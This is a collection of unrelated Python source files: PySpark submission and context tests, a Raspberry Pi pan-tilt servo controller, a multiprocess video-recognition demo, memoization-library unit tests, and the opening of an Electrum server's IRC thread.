|print(sc.parallelize([1, 2, 3]).map(foo).collect())
""")
proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[3, 6, 9]", out.decode('utf-8'))
def test_module_dependency(self):
"""Submit and test a script with a dependency on another module"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
zip = self.createFileInZip("mylib.py", """
|def myfunc(x):
| return x + 1
""")
proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_module_dependency_on_cluster(self):
"""Submit and test a script with a dependency on another module on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
zip = self.createFileInZip("mylib.py", """
|def myfunc(x):
| return x + 1
""")
proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, "--master",
"local-cluster[1,1,1024]", script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_package_dependency(self):
"""Submit and test a script with a dependency on a Spark Package"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
self.create_spark_package("a:mylib:0.1")
proc = subprocess.Popen([self.sparkSubmit, "--packages", "a:mylib:0.1", "--repositories",
"file:" + self.programDir, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_package_dependency_on_cluster(self):
"""Submit and test a script with a dependency on a Spark Package on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
self.create_spark_package("a:mylib:0.1")
proc = subprocess.Popen([self.sparkSubmit, "--packages", "a:mylib:0.1", "--repositories",
"file:" + self.programDir, "--master",
"local-cluster[1,1,1024]", script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_single_script_on_cluster(self):
"""Submit and test a single script on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|def foo(x):
| return x * 2
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(foo).collect())
""")
# this will fail if you have different spark.executor.memory
# in conf/spark-defaults.conf
proc = subprocess.Popen(
[self.sparkSubmit, "--master", "local-cluster[1,1,1024]", script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 4, 6]", out.decode('utf-8'))
class ContextTests(unittest.TestCase):
def test_failed_sparkcontext_creation(self):
# Regression test for SPARK-1550
self.assertRaises(Exception, lambda: SparkContext("an-invalid-master-name"))
def test_get_or_create(self):
with SparkContext.getOrCreate() as sc:
self.assertTrue(SparkContext.getOrCreate() is sc)
def test_stop(self):
sc = SparkContext()
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
def test_with(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_exception(self):
try:
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
raise Exception()
except:
pass
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_stop(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
def test_progress_api(self):
with SparkContext() as sc:
sc.setJobGroup('test_progress_api', '', True)
rdd = sc.parallelize(range(10)).map(lambda x: time.sleep(100))
def run():
try:
rdd.count()
except Exception:
pass
t = threading.Thread(target=run)
t.daemon = True
t.start()
# wait for scheduler to start
time.sleep(1)
tracker = sc.statusTracker()
jobIds = tracker.getJobIdsForGroup('test_progress_api')
self.assertEqual(1, len(jobIds))
job = tracker.getJobInfo(jobIds[0])
self.assertEqual(1, len(job.stageIds))
stage = tracker.getStageInfo(job.stageIds[0])
self.assertEqual(rdd.getNumPartitions(), stage.numTasks)
sc.cancelAllJobs()
t.join()
# wait for event listener to update the status
time.sleep(1)
job = tracker.getJobInfo(jobIds[0])
self.assertEqual('FAILED', job.status)
self.assertEqual([], tracker.getActiveJobsIds())
self.assertEqual([], tracker.getActiveStageIds())
sc.stop()
def test_startTime(self):
with SparkContext() as sc:
self.assertGreater(sc.startTime, 0)
@unittest.skipIf(not _have_scipy, "SciPy not installed")
class SciPyTests(PySparkTestCase):
"""General PySpark tests that depend on scipy """
def test_serialize(self):
from scipy.special import gammaln
x = range(1, 5)
expected = list(map(gammaln, x))
observed = self.sc.parallelize(x).map(gammaln).collect()
self.assertEqual(expected, observed)
@unittest.skipIf(not _have_numpy, "NumPy not installed")
class NumPyTests(PySparkTestCase):
"""General PySpark tests that depend on numpy """
def test_statcounter_array(self):
x = self.sc.parallelize([np.array([1.0, 1.0]), np.array([2.0, 2.0]), np.array([3.0, 3.0])])
s = x.stats()
self.assertSequenceEqual([2.0, 2.0], s.mean().tolist())
self.assertSequenceEqual([1.0, 1.0], s.min().tolist())
self.assertSequenceEqual([3.0, 3.0], s.max().tolist())
self.assertSequenceEqual([1.0, 1.0], s.sampleStdev().tolist())
stats_dict = s.asDict()
self.assertEqual(3, stats_dict['count'])
self.assertSequenceEqual([2.0, 2.0], stats_dict['mean'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_dict['min'].tolist())
self.assertSequenceEqual([3.0, 3.0], stats_dict['max'].tolist())
self.assertSequenceEqual([6.0, 6.0], stats_dict['sum'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_dict['stdev'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_dict['variance'].tolist())
stats_sample_dict = s.asDict(sample=True)
self.assertEqual(3, stats_dict['count'])
self.assertSequenceEqual([2.0, 2.0], stats_sample_dict['mean'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_sample_dict['min'].tolist())
self.assertSequenceEqual([3.0, 3.0], stats_sample_dict['max'].tolist())
self.assertSequenceEqual([6.0, 6.0], stats_sample_dict['sum'].tolist())
self.assertSequenceEqual(
[0.816496580927726, 0.816496580927726], stats_sample_dict['stdev'].tolist())
self.assertSequenceEqual(
[0.6666666666666666, 0.6666666666666666], stats_sample_dict['variance'].tolist())
if __name__ == "__main__":
if not _have_scipy:
print("NOTE: Skipping SciPy tests as it does not seem to be installed")
if not _have_numpy:
print("NOTE: Skipping NumPy tests as it does not seem to be installed")
unittest.main()
if not _have_scipy:
print("NOTE: SciPy tests were skipped as it does not seem to be installed")
if not _have_numpy:
print("NOTE: NumPy tests were skipped as it does not seem to be installed")
|
manager.py
|
import logging
from multiprocessing import Value, Process, Manager
import pantilthat_waveshare as pth
import signal
import sys
from rpi_deep_pantilt.detect.camera import run_pantilt_detect
from rpi_deep_pantilt.control.pid import PIDController
logging.basicConfig()
LOGLEVEL = logging.getLogger().getEffectiveLevel()
RESOLUTION = (320, 320)
SERVO_MIN = -90
SERVO_MAX = 90
CENTER = (
RESOLUTION[0] // 2,
RESOLUTION[1] // 2
)
# function to handle keyboard interrupt
def signal_handler(sig, frame):
# print a status message
print("[INFO] You pressed `ctrl + c`! Exiting...")
# disable the servos
pth.servo_enable(1, False)
pth.servo_enable(2, False)
# exit
sys.exit()
def in_range(val, start, end):
# determine the input vale is in the supplied range
return (val >= start and val <= end)
def set_servos(pan, tilt):
# signal trap to handle keyboard interrupt
signal.signal(signal.SIGINT, signal_handler)
while True:
pan_angle = -1 * pan.value
tilt_angle = tilt.value
# if the pan angle is within the range, pan
if in_range(pan_angle, SERVO_MIN, SERVO_MAX):
pth.pan(pan_angle)
else:
logging.info(f'pan_angle not in range {pan_angle}')
if in_range(tilt_angle, SERVO_MIN, SERVO_MAX):
pth.tilt(tilt_angle)
else:
logging.info(f'tilt_angle not in range {tilt_angle}')
def pid_process(output, p, i, d, box_coord, origin_coord, action):
# signal trap to handle keyboard interrupt
signal.signal(signal.SIGINT, signal_handler)
# create a PID and initialize it
p = PIDController(p.value, i.value, d.value)
p.reset()
# loop indefinitely
while True:
error = origin_coord - box_coord.value
output.value = p.update(error)
# logging.info(f'{action} error {error} angle: {output.value}')
# ('person',)
#('orange', 'apple', 'sports ball')
def pantilt_process_manager(
model_cls,
labels=('person',),
rotation=0
):
pth.servo_enable(1, True)
pth.servo_enable(2, True)
with Manager() as manager:
# set initial bounding box (x, y)-coordinates to center of frame
center_x = manager.Value('i', 0)
center_y = manager.Value('i', 0)
center_x.value = RESOLUTION[0] // 2
center_y.value = RESOLUTION[1] // 2
# pan and tilt angles updated by independent PID processes
pan = manager.Value('i', 0)
tilt = manager.Value('i', 0)
# PID gains for panning
pan_p = manager.Value('f', 0.05)
# 0 time integral gain until inferencing is faster than ~50ms
pan_i = manager.Value('f', 0.1)
pan_d = manager.Value('f', 0)
# PID gains for tilting
tilt_p = manager.Value('f', 0.15)
# 0 time integral gain until inferencing is faster than ~50ms
tilt_i = manager.Value('f', 0.2)
tilt_d = manager.Value('f', 0)
detect_processr = Process(target=run_pantilt_detect,
args=(center_x, center_y, labels, model_cls, rotation))
pan_process = Process(target=pid_process,
args=(pan, pan_p, pan_i, pan_d, center_x, CENTER[0], 'pan'))
tilt_process = Process(target=pid_process,
args=(tilt, tilt_p, tilt_i, tilt_d, center_y, CENTER[1], 'tilt'))
servo_process = Process(target=set_servos, args=(pan, tilt))
detect_processr.start()
pan_process.start()
tilt_process.start()
servo_process.start()
detect_processr.join()
pan_process.join()
tilt_process.join()
servo_process.join()
if __name__ == '__main__':
pantilt_process_manager()
|
demo.py
|
# -*- coding: utf-8 -*-
"""
@date: 2020/10/30 下午3:42
@file: visualization.py
@author: zj
@description:
"""
import numpy as np
import torch
import torch.multiprocessing as mp
import time
from tsn.util.parser import load_test_config, parse_test_args
from demo.multiprocess.stop_token import _StopToken
from demo.multiprocess.manager.video_provider import VideoProvider
from demo.multiprocess.manager import VideoManager
from demo.multiprocess.predictor.action_predictor import ActionPredictor
from demo.multiprocess.visualizer.video_visualizor import VideoVisualizer
time_decay = 0.001
def read(cfg, task_queue):
provider = VideoProvider(cfg)
for able_to_read, task in provider:
if not able_to_read:
task_queue.put(_StopToken())
break
start = time.time()
task_queue.put(task, block=False)
print('one put task_queue need: {}'.format(time.time() - start))
provider.clean()
time.sleep(100)
def write(cfg, result_queue):
manager = VideoManager(cfg)
while True:
start = time.time()
if result_queue.empty():
time.sleep(time_decay)
continue
task = result_queue.get()
end = time.time()
print('one get result_queue need: {}'.format(end - start))
if isinstance(task, _StopToken):
break
ret = manager(task)
print('one compute manager need: {}'.format(time.time() - end))
manager.clean()
def predict(cfg, task_queue, predict_queue):
np.random.seed(cfg.RNG_SEED)
torch.manual_seed(cfg.RNG_SEED)
torch.backends.cudnn.deterministic = False
torch.backends.cudnn.benchmark = True
predictor = ActionPredictor(cfg)
while True:
start = time.time()
if task_queue.empty():
time.sleep(time_decay)
continue
task = task_queue.get()
end = time.time()
print('one get task_queue need: {}'.format(end - start))
if isinstance(task, _StopToken):
predict_queue.put(_StopToken())
break
task = predictor(task)
end1 = time.time()
print('one task predict need: {}'.format(end1 - end))
predict_queue.put(task, block=False)
print('one put predict_queue need: {}'.format(time.time() - end1))
time.sleep(100)
def visualize(cfg, predict_queue, result_queue):
visualizer = VideoVisualizer(cfg)
while True:
start = time.time()
if predict_queue.empty():
time.sleep(time_decay)
continue
task = predict_queue.get()
end = time.time()
print('one get predict_queue need: {}'.format(end - start))
if isinstance(task, _StopToken):
result_queue.put(_StopToken())
break
task = visualizer(task)
end1 = time.time()
print('one compute visualizer need: {}'.format(end1 - end))
result_queue.put(task, block=False)
print('one put result_queue need: {}'.format(time.time() - end1))
time.sleep(100)
def main():
args = parse_test_args()
cfg = load_test_config(args)
# 任务队列,保存待预测数据
task_queue = mp.Queue()
# 预测队列,保存待绘制数据
predict_queue = mp.Queue()
# 结果队列,保存待显示数据
result_queue = mp.Queue()
process_read = mp.Process(target=read, args=(cfg, task_queue), daemon=True)
process_predict = mp.Process(target=predict, args=(cfg, task_queue, predict_queue), daemon=True)
process_visualize = mp.Process(target=visualize, args=(cfg, predict_queue, result_queue), daemon=True)
process_write = mp.Process(target=write, args=(cfg, result_queue))
process_write.start()
process_visualize.start()
process_predict.start()
time.sleep(2)
process_read.start()
process_read.join()
process_predict.join()
process_visualize.join()
process_write.join()
if __name__ == '__main__':
main()
|
test.py
|
import unittest
import random
import weakref
import gc
import time
from itertools import chain
from threading import Thread
from threading import Lock
from memoization import cached, CachingAlgorithmFlag
from memoization.caching.general.keys import make_key
exec_times = {} # executed time of each tested function
lock = Lock() # for multi-threading tests
random.seed(100) # set seed to ensure that test results are reproducible
for i in range(1, 17):
exec_times['f' + str(i)] = 0 # init to zero
################################################################################
# Tested functions
################################################################################
@cached
def f1(x):
exec_times['f1'] += 1
return x
@cached()
def f2(x):
exec_times['f2'] += 1
return x
@cached(max_size=5, algorithm=CachingAlgorithmFlag.FIFO, thread_safe=False)
def f3(x):
exec_times['f3'] += 1
return x
@cached(max_size=5, algorithm=CachingAlgorithmFlag.LRU, thread_safe=False)
def f4(x):
exec_times['f4'] += 1
return x
@cached(max_size=5, algorithm=CachingAlgorithmFlag.LFU, thread_safe=False)
def f5(x):
exec_times['f5'] += 1
return x
@cached(max_size=5, algorithm=CachingAlgorithmFlag.FIFO, thread_safe=True)
def f6(x):
with lock:
exec_times['f6'] += 1
return x
@cached(max_size=5, algorithm=CachingAlgorithmFlag.LRU, thread_safe=True)
def f7(x):
with lock:
exec_times['f7'] += 1
return x
@cached(max_size=5, algorithm=CachingAlgorithmFlag.LFU, thread_safe=True)
def f8(x):
with lock:
exec_times['f8'] += 1
return x
@cached(max_size=5, algorithm=CachingAlgorithmFlag.FIFO, thread_safe=False, ttl=0.5)
def f9(x):
exec_times['f9'] += 1
return x
@cached(max_size=5, algorithm=CachingAlgorithmFlag.LRU, thread_safe=False, ttl=0.5)
def f10(x):
exec_times['f10'] += 1
return x
@cached(max_size=5, algorithm=CachingAlgorithmFlag.LFU, thread_safe=False, ttl=0.5)
def f11(x):
exec_times['f11'] += 1
return x
@cached(max_size=5, algorithm=CachingAlgorithmFlag.FIFO, thread_safe=False, ttl=0.5)
def f12(arg, **kwargs):
exec_times['f12'] += 1
return [arg] + [(key, value) for (key, value) in kwargs.items()]
@cached(max_size=5, algorithm=CachingAlgorithmFlag.LRU, thread_safe=False, ttl=0.5)
def f13(arg, **kwargs):
exec_times['f13'] += 1
return [arg] + [(key, value) for (key, value) in kwargs.items()]
@cached(max_size=5, algorithm=CachingAlgorithmFlag.LFU, thread_safe=False, ttl=0.5)
def f14(arg, **kwargs):
exec_times['f14'] += 1
return [arg] + [(key, value) for (key, value) in kwargs.items()]
@cached(max_size=0)
def f15(x):
exec_times['f15'] += 1
return x
@cached()
def f16(*args, **kwargs):
exec_times['f16'] += 1
return list(args) + [(key, value) for (key, value) in kwargs.items()]
################################################################################
# Test entry point
################################################################################
class TestMemoization(unittest.TestCase):
def test_memoization_with_default_arguments(self):
for _ in range(5):
f1(10)
f2(10)
f1(20)
f2(20)
self.assertEqual(exec_times['f1'], 2)
self.assertEqual(exec_times['f2'], 2)
for info in f1.cache_info(), f2.cache_info():
self.assertIsNone(info.max_size)
self.assertEqual(info.algorithm, CachingAlgorithmFlag.LRU)
self.assertIsNone(info.ttl)
self.assertTrue(info.thread_safe)
self.assertEqual(info.hits, 4)
self.assertEqual(info.misses, 2)
self.assertEqual(info.current_size, 2)
for f in f1, f2:
keys = make_key((10,), None), make_key((20,), None)
for key in keys:
self.assertIn(key, f._cache)
f1.cache_clear()
f2.cache_clear()
self._check_empty_cache_after_clearing(f1)
self._check_empty_cache_after_clearing(f2)
def test_memoization_with_FIFO(self):
self.assertTrue(hasattr(f3, '_fifo_root'))
self._fifo_test(f3)
f3.cache_clear()
self._check_empty_cache_after_clearing(f3)
def test_memoization_with_LRU(self):
self.assertTrue(hasattr(f4, '_lru_root'))
self._lru_test(f4)
f4.cache_clear()
self._check_empty_cache_after_clearing(f4)
def test_memoization_with_LFU(self):
self.assertTrue(hasattr(f5, '_lfu_root'))
self._lfu_test(f5)
self._check_lfu_cache_clearing(f5)
def test_memoization_with_FIFO_multithread(self):
self.assertTrue(hasattr(f6, '_fifo_root'))
self._general_multithreading_test(f6, CachingAlgorithmFlag.FIFO)
self._fifo_test(f6)
f6.cache_clear()
self._check_empty_cache_after_clearing(f6)
def test_memoization_with_LRU_multithread(self):
self.assertTrue(hasattr(f7, '_lru_root'))
self._general_multithreading_test(f7, CachingAlgorithmFlag.LRU)
self._lru_test(f7)
f7.cache_clear()
self._check_empty_cache_after_clearing(f7)
def test_memoization_with_LFU_multithread(self):
self.assertTrue(hasattr(f8, '_lfu_root'))
self._general_multithreading_test(f8, CachingAlgorithmFlag.LFU)
self._lfu_test(f8)
self._check_lfu_cache_clearing(f8)
def test_memoization_with_FIFO_TTL(self):
self.assertTrue(hasattr(f9, '_fifo_root'))
self._general_ttl_test(f9)
f9.cache_clear()
self._check_empty_cache_after_clearing(f9)
def test_memoization_with_LRU_TTL(self):
self.assertTrue(hasattr(f10, '_lru_root'))
self._general_ttl_test(f10)
f10.cache_clear()
self._check_empty_cache_after_clearing(f10)
def test_memoization_with_LFU_TTL(self):
self.assertTrue(hasattr(f11, '_lfu_root'))
self._general_ttl_test(f11)
self._check_lfu_cache_clearing(f11)
def test_memoization_with_FIFO_TTL_kwargs(self):
self.assertTrue(hasattr(f12, '_fifo_root'))
self._general_ttl_kwargs_test(f12)
f12.cache_clear()
self._check_empty_cache_after_clearing(f12)
def test_memoization_with_LRU_TTL_kwargs(self):
self.assertTrue(hasattr(f13, '_lru_root'))
self._general_ttl_kwargs_test(f13)
f13.cache_clear()
self._check_empty_cache_after_clearing(f13)
def test_memoization_with_LFU_TTL_kwargs(self):
self.assertTrue(hasattr(f14, '_lfu_root'))
self._general_ttl_kwargs_test(f14)
self._check_lfu_cache_clearing(f14)
def test_memoization_for_unhashable_arguments_with_FIFO(self):
self._general_unhashable_arguments_test(f3)
f3.cache_clear()
self._check_empty_cache_after_clearing(f3)
def test_memoization_for_unhashable_arguments_with_LRU(self):
self._general_unhashable_arguments_test(f4)
f4.cache_clear()
self._check_empty_cache_after_clearing(f4)
def test_memoization_for_unhashable_arguments_with_LFU(self):
self._general_unhashable_arguments_test(f5)
self._check_lfu_cache_clearing(f5)
def test_memoization_statistic_only(self):
f15(1)
f15(2)
f15(3)
self.assertEqual(exec_times['f15'], 3)
info = f15.cache_info()
self.assertEqual(info.max_size, 0)
self.assertIsNone(info.ttl)
self.assertTrue(info.thread_safe)
self.assertEqual(info.hits, 0)
self.assertEqual(info.misses, 3)
self.assertEqual(info.current_size, 0)
f15.cache_clear()
info = f15.cache_info()
self.assertEqual(info.hits, 0)
self.assertEqual(info.misses, 0)
self.assertEqual(info.current_size, 0)
def test_memoization_for_diffrent_order_of_kwargs(self):
f16(
1,
2,
kwarg1={"some": "dict"},
kwarg2=["it's", "a", "list"],
kwarg3="just_string",
kwarg4=4,
)
f16(
1,
2,
kwarg2=["it's", "a", "list"],
kwarg1={"some": "dict"},
kwarg4=4,
kwarg3="just_string",
)
f16(
1,
2,
kwarg3="just_string",
kwarg1={"some": "dict"},
kwarg4=4,
kwarg2=["it's", "a", "list"],
)
self.assertEqual(exec_times['f16'], 1)
info = f16.cache_info()
self.assertEqual(info.hits, 2)
self.assertEqual(info.misses, 1)
self.assertEqual(info.current_size, 1)
def _general_test(self, tested_function, algorithm, hits, misses, in_cache, not_in_cache):
# clear
exec_times[tested_function.__name__] = 0
tested_function.cache_clear()
for i in range(20):
tested_function(i)
tested_function(99)
self.assertEqual(exec_times[tested_function.__name__], 21)
info = tested_function.cache_info()
self.assertEqual(info.max_size, 5)
self.assertEqual(info.algorithm, algorithm)
self.assertIsNone(info.ttl)
self.assertIsNotNone(info.thread_safe)
self.assertEqual(info.hits, 0)
self.assertEqual(info.misses, 21)
self.assertEqual(info.current_size, 5)
keys = [make_key((x,), None) for x in (99, 19, 18, 17, 16)]
for key in keys:
self.assertIn(key, tested_function._cache)
# 10 consecutive calls here
tested_function(16)
tested_function(17)
tested_function(18)
tested_function(16)
tested_function(17)
tested_function(18)
tested_function(19)
tested_function(15)
tested_function(100)
tested_function(16)
info = tested_function.cache_info()
self.assertEqual(info.hits, hits)
self.assertEqual(info.misses, misses)
self.assertEqual(info.current_size, 5)
keys = [make_key((x,), None) for x in in_cache]
for key in keys:
self.assertIn(key, tested_function._cache)
keys = [make_key((x,), None) for x in chain(not_in_cache, range(0, 15))]
for key in keys:
self.assertNotIn(key, tested_function._cache)
def _general_multithreading_test(self, tested_function, algorithm):
number_of_keys = 30000
number_of_threads = 4
# clear
exec_times[tested_function.__name__] = 0
tested_function.cache_clear()
info = tested_function.cache_info()
self.assertEqual(info.max_size, 5)
self.assertEqual(info.algorithm, algorithm)
self.assertIsNone(info.ttl)
self.assertTrue(info.thread_safe)
self.assertEqual(info.current_size, 0)
# Test must-hit
def run_must_hit():
keys = list(range(5)) * int(number_of_keys / 5)
random.shuffle(keys)
for i in keys:
tested_function(i)
threads = [Thread(target=run_must_hit) for _ in range(number_of_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertGreaterEqual(exec_times[tested_function.__name__], 5)
info = tested_function.cache_info()
self.assertLessEqual(info.hits, number_of_keys * number_of_threads - 5)
self.assertGreaterEqual(info.misses, 5)
self.assertEqual(info.current_size, 5)
for key in [make_key((x,), None) for x in range(5)]:
self.assertIn(key, tested_function._cache)
# Test can-miss
def run_can_miss():
keys = list(range(20)) * int(number_of_keys / 20)
random.shuffle(keys)
for i in keys:
tested_function(i)
threads = [Thread(target=run_can_miss) for _ in range(number_of_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
executed_times = exec_times[tested_function.__name__]
self.assertLessEqual(executed_times, number_of_keys * number_of_threads)
self.assertGreaterEqual(executed_times, 20)
info = tested_function.cache_info()
self.assertGreaterEqual(info.hits, 0)
self.assertLessEqual(info.misses, number_of_keys * number_of_threads)
self.assertEqual(info.current_size, 5)
def _fifo_test(self, tested_function):
self._general_test(tested_function=tested_function, algorithm=CachingAlgorithmFlag.FIFO, hits=7, misses=24,
in_cache=(16, 100, 15, 99, 19), not_in_cache=(18, 17))
self.assertEqual(exec_times[tested_function.__name__], 24)
caching_key_list = [item[0] for item in tested_function._get_caching_list()]
self.assertEqual(caching_key_list, [[16], [100], [15], [99], [19]])
def _lru_test(self, tested_function):
self._general_test(tested_function=tested_function, algorithm=CachingAlgorithmFlag.LRU, hits=7, misses=24,
in_cache=(16, 100, 15, 19, 18), not_in_cache=(99, 17))
self.assertEqual(exec_times[tested_function.__name__], 24)
caching_key_list = [item[0] for item in tested_function._get_caching_list()]
self.assertEqual(caching_key_list, [[16], [100], [15], [19], [18]])
def _lfu_test(self, tested_function):
self._general_test(tested_function=tested_function, algorithm=CachingAlgorithmFlag.LFU, hits=8, misses=23,
in_cache=(18, 17, 16, 19, 100), not_in_cache=(99, 15))
self.assertEqual(exec_times[tested_function.__name__], 23)
caching_key_list = [item[0] for item in tested_function._get_caching_list()]
self.assertEqual(caching_key_list, [[16], [18], [17], [19], [100]])
def _check_empty_cache_after_clearing(self, tested_function):
info = tested_function.cache_info()
self.assertEqual(info.hits, 0)
self.assertEqual(info.misses, 0)
self.assertEqual(info.current_size, 0)
cache = tested_function._cache
self.assertEqual(len(cache), 0)
def _check_lfu_cache_clearing(self, tested_function):
root_next = weakref.ref(tested_function._lfu_root.next)
first_cache_head = weakref.ref(tested_function._lfu_root.next.cache_head)
self.assertIsNotNone(root_next())
self.assertIsNotNone(first_cache_head())
tested_function.cache_clear()
self._check_empty_cache_after_clearing(tested_function)
gc.collect()
self.assertIsNone(root_next())
self.assertIsNone(first_cache_head())
def _general_ttl_test(self, tested_function, arg=1, kwargs=None):
# clear
exec_times[tested_function.__name__] = 0
tested_function.cache_clear()
def call_tested_function(arg, kwargs):
if kwargs is None:
tested_function(arg)
else:
tested_function(arg, **kwargs)
key = make_key((arg,), kwargs)
call_tested_function(arg, kwargs)
time.sleep(0.25) # wait for a short time
info = tested_function.cache_info()
self.assertEqual(info.hits, 0)
self.assertEqual(info.misses, 1)
self.assertEqual(info.current_size, 1)
self.assertIn(key, tested_function._cache)
call_tested_function(arg, kwargs) # this WILL NOT call the tested function
info = tested_function.cache_info()
self.assertEqual(info.hits, 1)
self.assertEqual(info.misses, 1)
self.assertEqual(info.current_size, 1)
self.assertIn(key, tested_function._cache)
self.assertEqual(exec_times[tested_function.__name__], 1)
time.sleep(0.35) # wait until the cache expires
info = tested_function.cache_info()
self.assertEqual(info.current_size, 1)
call_tested_function(arg, kwargs) # this WILL call the tested function
info = tested_function.cache_info()
self.assertEqual(info.hits, 1)
self.assertEqual(info.misses, 2)
self.assertEqual(info.current_size, 1)
self.assertIn(key, tested_function._cache)
self.assertEqual(exec_times[tested_function.__name__], 2)
# The previous call should have been cached, so it must not call the function again
call_tested_function(arg, kwargs) # this SHOULD NOT call the tested function
info = tested_function.cache_info()
self.assertEqual(info.hits, 2)
self.assertEqual(info.misses, 2)
self.assertEqual(info.current_size, 1)
self.assertIn(key, tested_function._cache)
self.assertEqual(exec_times[tested_function.__name__], 2)
def _general_ttl_kwargs_test(self, tested_function):
self._general_ttl_test(tested_function, arg=1, kwargs={"test": {"kwargs": [1, 0.5]}, "complex": True})
def _general_unhashable_arguments_test(self, tested_function):
args = ([1, 2, 3], {'this': 'is unhashable'}, ['yet', ['another', ['complex', {'type, ': 'isn\'t it?'}]]])
for arg in args:
# clear
exec_times[tested_function.__name__] = 0
tested_function.cache_clear()
key = make_key((arg,), None)
tested_function(arg)
self.assertIn(key, tested_function._cache)
if isinstance(arg, list):
arg.append(0)
elif isinstance(arg, dict):
arg['foo'] = 'bar'
else:
raise TypeError
key = make_key((arg,), None)
tested_function(arg)
self.assertIn(key, tested_function._cache)
if isinstance(arg, list):
arg.pop()
elif isinstance(arg, dict):
del arg['foo']
else:
raise TypeError
key = make_key((arg,), None)
tested_function(arg)
self.assertIn(key, tested_function._cache)
self.assertEqual(exec_times[tested_function.__name__], 2)
info = tested_function.cache_info()
self.assertEqual(info.hits, 1)
self.assertEqual(info.misses, 2)
self.assertEqual(info.current_size, 2)
if __name__ == '__main__':
unittest.main()
|
ircthread.py
|
#!/usr/bin/env python
# Copyright(C) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import re
import time
import socket
import ssl
import threading
import Queue
import irc.client
from utils import logger
from utils import Hash
from version import VERSION
out_msg = []
class IrcThread(threading.Thread):
def __init__(self, processor, config):
threading.Thread.__init__(self)
self.processor = processor
self.daemon = True
options = dict(config.items('server'))
self.stratum_tcp_port = options.get('stratum_tcp_port')
self.stratum_tcp_ssl_port = options.get('stratum_tcp_ssl_port')
self.report_stratum_tcp_port = options.get('report_stratum_tcp_port')
self.report_stratum_tcp_ssl_port = options.get('report_stratum_tcp_ssl_port')
self.irc_bind_ip = options.get('irc_bind_ip')
self.host = options.get('host')
self.report_host = options.get('report_host')
self.nick = options.get('irc_nick')
if self.report_stratum_tcp_port:
self.stratum_tcp_port = self.report_stratum_tcp_port
if self.report_stratum_tcp_ssl_port:
self.stratum_tcp_ssl_port = self.report_stratum_tcp_ssl_port
if self.report_host:
self.host = self.report_host
if not self.nick:
self.nick = Hash(self.host)[:5].encode("hex")
self.pruning = True
self.pruning_limit = config.get('leveldb', 'pruning_limit')
self.nick = 'E_' + self.nick
self.password = None
self.who_queue = Queue.Queue()
def getname(self):
s = 'v' + VERSION + ' '
if self.pruning:
s += 'p' + self.pruning_limit + ' '
def add_port(letter, number):
DEFAULT_PORTS = {'t':'50001', 's':'50002'}
if not number: return ''
if DEFAULT_PORTS[letter] == number:
return letter + ' '
else:
return letter + number + ' '
s += add_port('t',self.stratum_tcp_port)
s += add_port('s',self.stratum_tcp_ssl_port)
return s
def start(self, queue):
self.queue = queue
threading.Thread.start(self)
def on_connect(self, connection, event):
connection.join("#electrum")
def on_join(self, connection, event):
m = re.match("(E_.*)!", event.source)
if m:
self.who_queue.put((connection, m.group(1)))
